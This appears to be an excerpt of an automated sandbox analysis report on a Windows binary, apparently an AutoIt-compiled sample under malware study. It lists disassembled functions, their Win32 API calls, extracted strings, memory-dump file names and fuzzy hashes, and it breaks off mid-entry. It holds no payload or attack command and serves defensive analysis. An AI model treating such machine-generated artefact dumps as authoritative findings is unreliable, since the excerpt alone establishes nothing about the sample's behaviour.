Opcode Fuzzy Hash: 8f1ad26262feaefa7d867d3872f6b8db15f1f3daf4d2a5cd82a20dfb9c055ccb
Instruction Fuzzy Hash: C951F534688709EBCB48DB50D9E29BE73B0AF153437604016FC2AAF291CB769D49DB43

Function 000F6A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 000F6A91
__wcsnicmp.LIBCMT ref: 000F6AA9
__wcsnicmp.LIBCMT ref: 000F6AC1
__wcsnicmp.LIBCMT ref: 000F6AD9
__wcsnicmp.LIBCMT ref: 000F6AF1
__wcsnicmp.LIBCMT ref: 000F6B09
__wcsnicmp.LIBCMT ref: 000F6B21
__wcsnicmp.LIBCMT ref: 000F6B35
__wcsnicmp.LIBCMT ref: 000F6B76
__wcsnicmp.LIBCMT ref: 000F6B8A
__wcsnicmp.LIBCMT ref: 000F6B9E
__wcsnicmp.LIBCMT ref: 000F6BB2

Strings

#ce, xrefs: 000F6BAC
Unterminated group of comments, xrefs: 0012E82C
#pragma compile, xrefs: 000F6A8B
#comments-start, xrefs: 000F6B1B, 000F6B70
#cs, xrefs: 000F6B2F, 000F6B84
#OnAutoItStartRegister, xrefs: 000F6AD3
#include-once, xrefs: 000F6AEB
#notrayicon, xrefs: 000F6AA3
#comments-end, xrefs: 000F6B98
#requireadmin, xrefs: 000F6ABB
Bad directive syntax error, xrefs: 0012E743
Cannot parse #include, xrefs: 0012E819
#include, xrefs: 000F6B03

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: a658088f1654a31a40879676a63b7c6dc872f4b52eb3bcece1390a7f208bf712
Instruction ID: 44b5938582f5b4e58bee2d9339075303a688b686ee5bdeec478733320e0f4bde
Opcode Fuzzy Hash: a658088f1654a31a40879676a63b7c6dc872f4b52eb3bcece1390a7f208bf712
Instruction Fuzzy Hash: 34812B70640219BBCB24AF20DD92FFF77A8AF25300F044035FE45AB582EB71DA95D6A1

Function 00178C44 Relevance: 40.7, APIs: 21, Strings: 2, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00178D34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00178D45
CharNextW.USER32(0000014E), ref: 00178D74
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00178DB5
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00178DCB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00178DDC
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00178DF9
SetWindowTextW.USER32(?,0000014E), ref: 00178E45
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00178E5B
SendMessageW.USER32(?,00001002,00000000,?), ref: 00178E8C
_memset.LIBCMT ref: 00178EB1
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00178EFA
_memset.LIBCMT ref: 00178F59
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00178F83
SendMessageW.USER32(?,00001074,?,00000001), ref: 00178FDB
SendMessageW.USER32(?,0000133D,?,?), ref: 00179088
InvalidateRect.USER32(?,00000000,00000001), ref: 001790AA
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001790F4
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00179121
DrawMenuBar.USER32(?), ref: 00179130
SetWindowTextW.USER32(?,0000014E), ref: 00179158

Strings

@U=u, xrefs: 00178D34, 00178D45, 00178D7A, 00178DF9, 00178E5B, 00178E8C, 00178EFA, 00178F83, 00178FDB, 00179088
0, xrefs: 001790C2

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0$@U=u
API String ID: 1073566785-975001249
Opcode ID: 658dbbaf397d351c0933f7dce28bc187d118c44dc48dca6ea0f267f70a4a7a38
Instruction ID: d7e31ad4e385e60aa79bd59451a4e3ed3b840b4ad63a4b04ec850d00eeedc976
Opcode Fuzzy Hash: 658dbbaf397d351c0933f7dce28bc187d118c44dc48dca6ea0f267f70a4a7a38
Instruction Fuzzy Hash: 3CE16071940219ABDF21DF64CC88EEE7BB9FF15720F108159F91DAA290DB708A85DF60

Function 00174B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00174C51
GetDesktopWindow.USER32 ref: 00174C66
GetWindowRect.USER32(00000000), ref: 00174C6D
GetWindowLongW.USER32(?,000000F0), ref: 00174CCF
DestroyWindow.USER32(?), ref: 00174CFB
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00174D24
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00174D42
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00174D68
SendMessageW.USER32(?,00000421,?,?), ref: 00174D7D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00174D90
IsWindowVisible.USER32(?), ref: 00174DB0
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00174DCB
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00174DDF
GetWindowRect.USER32(?,?), ref: 00174DF7
MonitorFromPoint.USER32(?,?,00000002), ref: 00174E1D
GetMonitorInfoW.USER32(00000000,?), ref: 00174E37
CopyRect.USER32(?,?), ref: 00174E4E
SendMessageW.USER32(?,00000412,00000000), ref: 00174EB9

Strings

0, xrefs: 00174BFC
(, xrefs: 00174E2A
tooltips_class32, xrefs: 00174D1D

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 47051f7fa2e2edae1571ef553a589922f61021752a9283c55b4e50a59c8e807b
Instruction ID: 95018eb7d4eb05584dbd1eb9fda5a538af4f5efc8dead46074a0482a0a856d76
Opcode Fuzzy Hash: 47051f7fa2e2edae1571ef553a589922f61021752a9283c55b4e50a59c8e807b
Instruction Fuzzy Hash: 07B14571608341AFDB04DF64C849B6ABBF4BB88710F00891DF5999B2A2DB75EC45CB92

Function 001546D6 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 001546E8
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0015470E
_wcscpy.LIBCMT ref: 0015473C
_wcscmp.LIBCMT ref: 00154747
_wcscat.LIBCMT ref: 0015475D
_wcsstr.LIBCMT ref: 00154768
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00154784
_wcscat.LIBCMT ref: 001547CD
_wcscat.LIBCMT ref: 001547D4
_wcsncpy.LIBCMT ref: 001547FF

Strings

DefaultLangCodepage, xrefs: 001547E7
04090000, xrefs: 001547BA
%u.%u.%u.%u, xrefs: 00154862
\VarFileInfo\Translation, xrefs: 0015477C
StringFileInfo\, xrefs: 00154757

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: aafb7765558277acd263401d13622ecd6a11df77f42673a877e685bc024059db
Instruction ID: a9d1de3092cf0e28b611e2809f8bfa58f579008be6544df0bd45a610838e2440
Opcode Fuzzy Hash: aafb7765558277acd263401d13622ecd6a11df77f42673a877e685bc024059db
Instruction Fuzzy Hash: 2E411676A04201BBDB18A7748C43FFF777CDF16710F00407AF908E6182EB70999296A5

Function 000F27D9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000F28BC
GetSystemMetrics.USER32(00000007), ref: 000F28C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000F28EF
GetSystemMetrics.USER32(00000008), ref: 000F28F7
GetSystemMetrics.USER32(00000004), ref: 000F291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000F2939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000F2949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 000F297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 000F2990
GetClientRect.USER32(00000000,000000FF), ref: 000F29AE
GetStockObject.GDI32(00000011), ref: 000F29CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 000F29D5

Part of subcall function 000F2344: GetCursorPos.USER32(?), ref: 000F2357
Part of subcall function 000F2344: ScreenToClient.USER32(001B67B0,?), ref: 000F2374
Part of subcall function 000F2344: GetAsyncKeyState.USER32(00000001), ref: 000F2399
Part of subcall function 000F2344: GetAsyncKeyState.USER32(00000002), ref: 000F23A7

SetTimer.USER32(00000000,00000000,00000028,000F1256), ref: 000F29FC

Strings

@U=u, xrefs: 000F29D5
AutoIt v3 GUI, xrefs: 000F2974

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: @U=u$AutoIt v3 GUI
API String ID: 1458621304-2077007950
Opcode ID: 37722f3e6c3a934285446608865d645a2717f52f407b408ae37860717c97268e
Instruction ID: d56d0b481c6b9a4c643f06fe8de436937c7bccebe73b7e26a20d5e1fd75ea4a3
Opcode Fuzzy Hash: 37722f3e6c3a934285446608865d645a2717f52f407b408ae37860717c97268e
Instruction Fuzzy Hash: D8B16C71A0020AEFDB14DFA8DC45BEE7BB5FB18310F108629FA15E7690DB749891DB90

Function 0014C4C1 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0014C4D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0014C4E6
SetWindowTextW.USER32(?,?), ref: 0014C4FD
GetDlgItem.USER32(?,000003EA), ref: 0014C512
SetWindowTextW.USER32(00000000,?), ref: 0014C518
GetDlgItem.USER32(?,000003E9), ref: 0014C528
SetWindowTextW.USER32(00000000,?), ref: 0014C52E
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0014C54F
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0014C569
GetWindowRect.USER32(?,?), ref: 0014C572
SetWindowTextW.USER32(?,?), ref: 0014C5DD
GetDesktopWindow.USER32 ref: 0014C5E3
GetWindowRect.USER32(00000000), ref: 0014C5EA
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0014C636
GetClientRect.USER32(?,?), ref: 0014C643
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0014C668
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0014C693

Strings

@U=u, xrefs: 0014C4E6

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID: @U=u
API String ID: 3869813825-2594219639
Opcode ID: 85cfc375127db7b9033f3121fcda54fccd6f8d9911db09092fd4918f7f0bbfa3
Instruction ID: 7fd746838bff29310548895c274754bdc753900a149da1769d389a54e617760e
Opcode Fuzzy Hash: 85cfc375127db7b9033f3121fcda54fccd6f8d9911db09092fd4918f7f0bbfa3
Instruction Fuzzy Hash: 53515F70A00709AFDB20DFA8DD85B6FBBB5FF04705F00492CE686A65B0D774A985CB50

Function 00174069 Relevance: 30.0, APIs: 3, Strings: 14, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 001740F6
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 001741B6

Strings

SELECT, xrefs: 00174250
@U=u, xrefs: 001741B6, 001741E8
SELECTCLEAR, xrefs: 00174235
GETITEMCOUNT, xrefs: 00174128
GETSUBITEMCOUNT, xrefs: 00174141
VIEWCHANGE, xrefs: 00174375
GETTEXT, xrefs: 0017415F
GETSELECTEDCOUNT, xrefs: 00174199
SELECTALL, xrefs: 0017421D
SELECTINVERT, xrefs: 00174286
FINDITEM, xrefs: 00174329
DESELECT, xrefs: 001742A4
GETSELECTED, xrefs: 001742E4
ISSELECTED, xrefs: 001741C1

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: @U=u$DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-1753161424
Opcode ID: e94fff561531a3e4fe819c8a8c561b1e4235ffd389cb327120ad833bebcc60dd
Instruction ID: 00adac0aec2f514aae21188c65ad277eb28ddf287086d66e8a56a313d4f1ebaa
Opcode Fuzzy Hash: e94fff561531a3e4fe819c8a8c561b1e4235ffd389cb327120ad833bebcc60dd
Instruction Fuzzy Hash: 6EA19D302143059BCB18EF20C991ABAB7F5BF95314F15896CB99A9B6D3DB30EC45CB81

Function 001652F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00165309
LoadCursorW.USER32(00000000,00007F8A), ref: 00165314
LoadCursorW.USER32(00000000,00007F00), ref: 0016531F
LoadCursorW.USER32(00000000,00007F03), ref: 0016532A
LoadCursorW.USER32(00000000,00007F8B), ref: 00165335
LoadCursorW.USER32(00000000,00007F01), ref: 00165340
LoadCursorW.USER32(00000000,00007F81), ref: 0016534B
LoadCursorW.USER32(00000000,00007F88), ref: 00165356
LoadCursorW.USER32(00000000,00007F80), ref: 00165361
LoadCursorW.USER32(00000000,00007F86), ref: 0016536C
LoadCursorW.USER32(00000000,00007F83), ref: 00165377
LoadCursorW.USER32(00000000,00007F85), ref: 00165382
LoadCursorW.USER32(00000000,00007F82), ref: 0016538D
LoadCursorW.USER32(00000000,00007F84), ref: 00165398
LoadCursorW.USER32(00000000,00007F04), ref: 001653A3
LoadCursorW.USER32(00000000,00007F02), ref: 001653AE
GetCursorInfo.USER32(?), ref: 001653BE
GetLastError.KERNEL32(00000001,00000000), ref: 001653E9

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 7e750961182e6ab844fbf3487ae3fee83d1513a893339fba919eff234f55f722
Instruction ID: 2d4ad12568443a2137525337f162ce783b14ba5793a3c78f040ec5cd785749da
Opcode Fuzzy Hash: 7e750961182e6ab844fbf3487ae3fee83d1513a893339fba919eff234f55f722
Instruction Fuzzy Hash: D0415370E043196ADB109FBA8C4996FFFB8EF51B50F10452FA509E7291DBB89441CE61

Function 0014AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0014AAA5
__swprintf.LIBCMT ref: 0014AB46
_wcscmp.LIBCMT ref: 0014AB59
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0014ABAE
_wcscmp.LIBCMT ref: 0014ABEA
GetClassNameW.USER32(?,?,00000400), ref: 0014AC21
GetDlgCtrlID.USER32(?), ref: 0014AC73
GetWindowRect.USER32(?,?), ref: 0014ACA9
GetParent.USER32(?), ref: 0014ACC7
ScreenToClient.USER32(00000000), ref: 0014ACCE
GetClassNameW.USER32(?,?,00000100), ref: 0014AD48
_wcscmp.LIBCMT ref: 0014AD5C
GetWindowTextW.USER32(?,?,00000400), ref: 0014AD82
_wcscmp.LIBCMT ref: 0014AD96

Part of subcall function 0011386C: _iswctype.LIBCMT ref: 00113874

Strings

%s%u, xrefs: 0014AB40

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: fd5da1daedec1997cb69d028a8fdcc9980b7c8172d3c6343591351a60a5c41ea
Instruction ID: 3bef22fcb8c5f9bff9ab56479f1de57ec5449fd0fe1ab7c0b2a0c3372c3f55de
Opcode Fuzzy Hash: fd5da1daedec1997cb69d028a8fdcc9980b7c8172d3c6343591351a60a5c41ea
Instruction Fuzzy Hash: 48A1D171644306AFDB18DF60C884BEAB7E8FF04315F51462DF9A9C25A0D730E996CB92

Function 0014B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0014B3DB
_wcscmp.LIBCMT ref: 0014B3EC
GetWindowTextW.USER32(00000001,?,00000400), ref: 0014B414
CharUpperBuffW.USER32(?,00000000), ref: 0014B431
_wcscmp.LIBCMT ref: 0014B44F
_wcsstr.LIBCMT ref: 0014B460
GetClassNameW.USER32(00000018,?,00000400), ref: 0014B498
_wcscmp.LIBCMT ref: 0014B4A8
GetWindowTextW.USER32(00000002,?,00000400), ref: 0014B4CF
GetClassNameW.USER32(00000018,?,00000400), ref: 0014B518
_wcscmp.LIBCMT ref: 0014B528
GetClassNameW.USER32(00000010,?,00000400), ref: 0014B550
GetWindowRect.USER32(00000004,?), ref: 0014B5B9

Strings

@, xrefs: 0014B3BC
ThumbnailClass, xrefs: 0014B4A3, 0014B523

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: ce74b6518c5e598dedd63a4d38c6f3ccfb1aadc23f8528538b971d4c3af49d23
Instruction ID: a4a2ffcb27be5c9eb5ecfdf50a700c5cbedf00329f6b257a3b0689e6256ff65c
Opcode Fuzzy Hash: ce74b6518c5e598dedd63a4d38c6f3ccfb1aadc23f8528538b971d4c3af49d23
Instruction Fuzzy Hash: 7F818E710083099BDB14DF14C8C5FAABBE8FF54314F088569FD899A0A6DB34DD8ACB61

Function 0017A428 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0017A4C8
DestroyWindow.USER32(?,?), ref: 0017A542

Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0017A5BC
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0017A5DE
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0017A5F1
DestroyWindow.USER32(00000000), ref: 0017A613
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,000F0000,00000000), ref: 0017A64A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0017A663
GetDesktopWindow.USER32 ref: 0017A67C
GetWindowRect.USER32(00000000), ref: 0017A683
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0017A69B
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0017A6B3

Part of subcall function 000F25DB: GetWindowLongW.USER32(?,000000EB), ref: 000F25EC

Strings

0, xrefs: 0017A4DE
@U=u, xrefs: 0017A5DE, 0017A5F1, 0017A663, 0017A68D
tooltips_class32, xrefs: 0017A5B5, 0017A643

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$@U=u$tooltips_class32
API String ID: 1297703922-1130792468
Opcode ID: df29835c9084c1c6eee4d0ee956e055e4eac395721b10fee866c7e8d2ad98d58
Instruction ID: 11f309a4618a7641a44dba816f299b3e1b8d29f3832c6595a997c8123106bcaf
Opcode Fuzzy Hash: df29835c9084c1c6eee4d0ee956e055e4eac395721b10fee866c7e8d2ad98d58
Instruction Fuzzy Hash: 7D718771144205AFD725CF28CC49FAA7BF6EF98700F58852CF989872A1C774E982CB12

Function 0017C8EE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623

DragQueryPoint.SHELL32(?,?), ref: 0017C917

Part of subcall function 0017ADF1: ClientToScreen.USER32(?,?), ref: 0017AE1A
Part of subcall function 0017ADF1: GetWindowRect.USER32(?,?), ref: 0017AE90
Part of subcall function 0017ADF1: PtInRect.USER32(?,?,0017C304), ref: 0017AEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 0017C980
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0017C98B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0017C9AE
_wcscat.LIBCMT ref: 0017C9DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0017C9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 0017CA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 0017CA25
SendMessageW.USER32(?,000000B1,?,?), ref: 0017CA47
DragFinish.SHELL32(?), ref: 0017CA4E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0017CB41

Strings

@GUI_DRAGFILE, xrefs: 0017CAF0
@U=u, xrefs: 0017C980, 0017C9F5, 0017CA0E, 0017CA25, 0017CA47
@GUI_DRAGID, xrefs: 0017CAB9
@GUI_DROPID, xrefs: 0017CA6E

Memory Dump Source

